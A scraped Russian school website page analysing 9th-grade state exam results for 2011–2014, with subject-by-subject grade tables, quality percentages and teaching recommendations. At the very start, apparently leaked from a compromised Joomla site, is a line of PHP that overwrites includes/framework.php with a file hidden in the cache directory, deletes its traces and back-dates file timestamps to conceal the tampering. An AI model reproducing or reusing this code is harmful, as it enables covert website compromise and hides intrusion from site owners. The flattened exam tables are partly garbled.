$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Анализ ГИА выпускников 9 класса за последние три года (2011-2014 гг)

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 299
Просмотры материалов : 218095

На сайте

Сейчас 20 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Анализ ГИА выпускников 9 класса за последние три года (2011-2014 гг)

Анализ государственной итоговой аттестации выпускников 9 класса  за последние три года

На конец 2011-2012учебного года в 9-ом классе обучалось 26 учащихся. Все учащиеся были допущены к итоговой аттестации.

Для проведения итоговой аттестации в 9-ом классе были выбраны экзамены  в форме ГИА и  традиционная форма. Итоги   следующие:

№ п\п

предмет

Количество учащихся

Итоги экзаменов

Качество обученности

«5»

«4»

«3»

«2»

% успев.

% качества знаний

1.

Алгебра ( ГИА)

23

2

7

14

-

100

39

2

Русский язык(ГИА)

23

8

13

2

-

100

91

3

Физика

8

-

1

7

-

100

13

4

История

4

2

-

2

-

100

50

5

Биология

7

3

3

1

-

100

86

6

Обществознание

20

8

6

6

-

100

70

7

Физическая культура

24

7

10

7

-

100

71

8

География

5

2

3

-

-

100

100

9

Литература

2

1

-

1

-

100

50

10

Химия

1

-

1

-

-

100

100

11

Алгебра

3

-

-

3

-

100

0

12

Русский язык

3

-

-

3

-

100

0

                              Анализ экзамена в новой форме по математике.

Всего уч-ся, сдававших экзамен

Количество уч-ся, получивших оценку:

«2»

«3»

«4»

«5»

(от 0 до 7 баллов за часть 1)

При выполнении минимального критерия

8-15

16-19

20-34

23

0

14

7

2

Результаты экзамена в баллах

Школьная отметка

«2»

«3»

«4»

«5»

Распределение баллов

0-7

8-10

11-15

16-19

20-25

26-30

31-34

Кол-во выпускников

0

1

13

7

2

0

0

Сопоставление результатов экзамена и школьной итоговой оценки

Предмет

Количество участников

Количество уч-ся понизивших школьные оценки

Количество уч-ся повысивших школьные оценки

Количество уч-ся подтвердивших школьные оценки

Математика

26

6

3

17

Итого:

26

6

3

17

Анализ результатов экзаменационных работ по русскому языку.

Результаты экзамена по пятибалльной шкале

Всего уч-ся, сдававших экзамен

Количество уч-ся, получивших оценку:

«2»

«3»

«4»

«5»

23

0

2

13

8

Распределение баллов с шагом в 5 баллов (0-42 баллов)

Всего выпускников, участвовавших в экзамене

Количество учащихся, набравших баллы:

0-5

6-10

11- 15

16-20

21-25

26-30

31-35

36-42

23

0

0

0

0

2

2

9

10

Лучшие результаты экзамена (40-42 балл):

ФИО учащегося

Название образовательного учреждения, класс

ФИО учителя, обучавшего выпускника

Баллы

1.

 

МБОУ «Сагарчинская СОШ»

 

40

2.

 

МБОУ «Сагарчинская СОШ»

 

42

3.

 

МБОУ «Сагарчинская СОШ»

 

41

Сопоставление результатов экзамена и школьной итоговой оценки:

Предмет

Количество участников

Количество уч-ся, понизивших школьные оценки

Количество уч-ся, повысивших школьные оценки

Количество уч-ся, подтвердивших школьные оценки

Русский

26

0

11

14

Итого

26

0

11

14

Успешно прошли итоговую аттестацию за курс основной школы и получили документ об основном общем образовании 26 учащихся.

.

2012-2013 учебный год

На конец 2012-2013 учебного года в 9 классе  обучалось 13 учащихся, из них в новой форме проходили аттестацию 10 учащихся, трое обучались по коррекционной программе.

Для проведения итоговой аттестации в 9-ом классе были выбраны новая форма ГИА, традиционная форма. Итоги   следующие:

№ п\п

Предмет

Количество учащихся

Итоги экзаменов

Качество обученности

«5»

«4»

«3»

«2»

% успев.

% качества знаний

1.

Алгебра ( ГИА)

10

4

4

2

-

100

80

2

Русский язык( ГИА)

10

6

2

2

-

100

80

3

Физика

1

-

-

1

-

100

0

4

Биология

5

2

2

1

0

100

80

5

Обществознание

11

3

4

4

0

100

63

6

Физическая культура

13

8

2

3

0

100

76

7

География

7

1

2

4

0

100

43

8

Литература

1

1

-

-

-

100

100

9

Химия

1

1

-

-

-

100

100

10

Алгебра

3

-

-

3

-

100

0

11

Русский язык

3

-

1

2

-

100

33,3

Сопоставление результатов экзамена и школьной итоговой оценки

Предмет

Количество участников

Количество уч-ся понизивших школьные оценки

Количество уч-ся повысивших школьные оценки

Количество уч-ся подтвердивших школьные оценки

Математика

13

0

6

7

Русский язык

13

0

8

5

Выводы и предложения

Низкое качество

Аттестационной комиссией отмечается слабая подготовка отдельных выпускников к устным экзаменам     практическая  часть по  физической культуре, физике, географии, биологии. 

2013-2014 учебный год

Результаты итоговой аттестации 9 класс 2013-2014 учебного года

№ п/п

класс

Кол-во уч-ся

Предмет

5

4

3

2

%

Усп.

%

Кач.Зн.

Учитель

1.

9

8

Русский язык

1

5

2

-

100

75%

 

2.

9

8

Математика

 

4

4

-

100

50

 

           

Сопоставление результатов экзамена и школьной итоговой оценки:

Предмет

Количество участников

Количество уч-ся, понизивших школьные оценки

Количество уч-ся, повысивших школьные оценки

Количество уч-ся, подтвердивших школьные оценки

Математика

8

1

0

7

Русский язык

8

1

0

7

Анализ статистических данных:

 

Результаты экзамена по пятибалльной шкале за выполнение

 

модуля «Алгебра» в отметку по алгебре

Наименование ОУ

Отметка по пятибалльной шкале

«2»

«3»

«4»

«5»

 

Суммарный балл по алгебраическим заданиям

0 – 5

6 – 11

12 – 16

17 – 23

МБОУ "Сагарчинская СОШ"

Количество выпускников, набравших баллы (по школе)

0

4

4

0

           

Результаты экзамена по пятибалльной шкале за выполнение

 

модуля «Геометрия» в отметку по геометрии

Наименование ОУ

Отметка по пятибалльной шкале

«2»

«3»

«4»

«5»

 

Суммарный балл по геометрическим заданиям

0 – 2

3 – 4

5 – 8

9 – 15

МБОУ "Сагарчинская СОШ"

Количество выпускников, набравших баллы (по школе)

0

8

0

0

Анализ ГИА по русскому языку (новой форме) в 9 классах  за три года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

23

-

0

2

8.6

13

56

8

35,4

100

91

2012-13

10

-

0

2

20

4

40

4

40

100

80

2013-14

8

-

0

2

26

5

65,5

1

13,5

100

75

Как видно из таблицы КО понизилось за три года  на 16 %.  В традиционной форме тоже понизилось.

Анализ ГИА по русскому языку (традиционной форме) в 9 класс за три года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

3

   

3

100

       

100

0

2012-13

3

   

2

66.6

1

33,3

   

100

33,3

2013-14

1

   

1

100

       

100

0

В традиционной форме экзамен сдавал 1 ученик. Экзамен прошёл без нарушений. Учащийся справился с работой на оценку «удовлетворительно»

Анализ ГИА по математике (новой форме) в 9 классах за три года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

23

-

0

14

63,3

7

30,1

2

6,6

100

39

2012-13

10

-

0

2

20

4

40

4

40

100

80

2013-14

8

-

0

4

50

4

50

-

-

100

50

Как видно из таблицы УО  остается  стабильным , а КО понизилось по сравнению с прошлым годом, но повысилось на 11% по сравнению с 2011-2012 уч.годом. В традиционной форме КО остается низким.

Анализ ГИА по математике (традиционной форме) в 9 классах по сравнению с прошлым годом

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

23

   

3

100

       

100

0

2012-13

10

   

3

100

       

100

0

2013-14

8

   

1

100

       

100

0

На основании результатов следует вывод о том, что учащиеся в основном допустили ошибки при решении примеров на темы «Преобразование алгебраических выражений», «Уравнения и системы уравнений», «Неравенства», «Задачи на движение», плохо понимают текстовые задачи, задачи с параметрами.

Выводы и рекомендации:

1 .Проанализировать результаты работы тех учителей, чьи классы дали низкие результаты, определить причины низкой успеваемости и возможности преодоления ошибок.

2. Эффективнее планировать повторение тех правил, при применении которых учащиеся допускают ошибки.

3.Продумывать индивидуальную работу с учащимися как на уроке, так и во внеурочное время, направленную на ликвидацию пробелов в ЗУН учащихся.

Анализ ГИА по физике (традиционной форме) в 9 классах за 2 года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

8

   

7

87

1

13

   

100

13

2012-13

1

   

1

         

100

0

 КО понизилось по сравнению с 2011-12 учебным годом, участники экзаменов тоже понизились.

Выводы и рекомендации:

1. В план подготовки учащихся 9-х классов к ГИА включить вопросы, связанные с отработкой навыков работы с источником, объяснение и анализ физических явлений и процессов.

         2.  Отрабатывать навыки выполнения лабораторных и практических работ.

Анализ ГИА по обществознанию (традиционной форме) в 9 классах за 2года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

20

-

-

6

30

6

30

8

40

100

70

2012-13

11

-

-

4

36,5

4

36,5

3

27

100

63

Из 26 учащихся школы обществознание в 2011-12 учебном году выбрали 20 учащихся . (68% учащихся). ОУ за два года остается прежней, КО на 7% понизилось.

 На достаточно высоком уровне у учащихся развиты следующие умения и навыки:

  • Распознавать существенные признаки понятий, характерные черты социального объекта, элементы его описания;
  • Оценивать различные суждения о социальных объектах с точки зрения общественных наук;
  • Распознавать понятия и их составляющие;
  • Проводить поиск социальной информации в различных источниках;
  • Сравнивать социальные объекты, выявлять их общие черты и различия;
  • Анализировать, классифицировать, интерпретировать имеющуюся  социальную информацию, соотносить ее со знаниями, полученными при изучении курса;
  • Формулировать собственные суждения и аргументы.

Выводы и рекомендации:

1.    В план подготовки учащихся 9-х классов к ГИА включить вопросы, связанные с отработкой  умений распознавать существенные признаки понятий, характерные черты социального объекта, элементы его описания, возможность оценивать различные суждения о социальных объектах, называть термины и понятия, социальные явления, соответствующие предлагаемому контексту, и применять их в предлагаемом контексте.

 2.  На уроках, при изучении определенных исторических событий отрабатывать навыки работы   выбора верных позиций из списка, умение осуществлять поиск социальной информации.

          3.  Обратить особое внимание на отработку навыков применения обществоведческих знаний при решении познавательных и практических задач, отражающих проблемы жизни человека и общества.

Анализ ГИА по географии (традиционной форме) в 9 классе за два года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

5

       

3

60

2

40

100

100

2012-13

7

   

4

56

2

28

1

14

100

43

Понижение КО на  57%

Анализ ГИА по литературе (традиционной форме) в 9 классе за два года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

2

   

1

50

   

1

50

100

50

2012-13

1

           

1

100

100

100

Повышение на 50%

Анализ ГИА по биологии (традиционной форме) в 9 классе за два года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

7

   

1

14

3

43

3

43

100

86

2012-13

     

1

20

2

40

2

40

100

80

Понижение КО на 6%

Анализ ГИА по физической культуре (традиционной форме) в 9 классе за два года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

24

   

7

28,5

10

43

7

28,5

100

71

2012-13

13

   

3

23,1

2

15,4

8

60,6

100

76

КО повысилось на 5%

Анализ ГИА по химии (традиционной форме) в 9 классе за два года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

1

       

1

     

100

100

2012-13

1

           

1

 

100

100

УО, КО -стабильно

Анализ ГИА по литературе (традиционной форме) в 9 классе за два года

Учебный год

Кол-во выпускников, сдававших экзамен

Отметка по 5- бальной шкале

УО%

КО%

2

%

3

%

4

%

5

%

2011-12

2

   

1

50

   

1

50

100

50

2012-13

1

           

1

100

100

100

КО повысилось на 50%.

Выводы и рекомендации:

1. Эффективнее планировать повторение тех разделов, при работе с которыми учащиеся испытывают сложности.

3. Продумывать индивидуальную работу с учащимися как на уроке, так и во внеурочное время, направленную на ликвидацию пробелов в знаниях учащихся.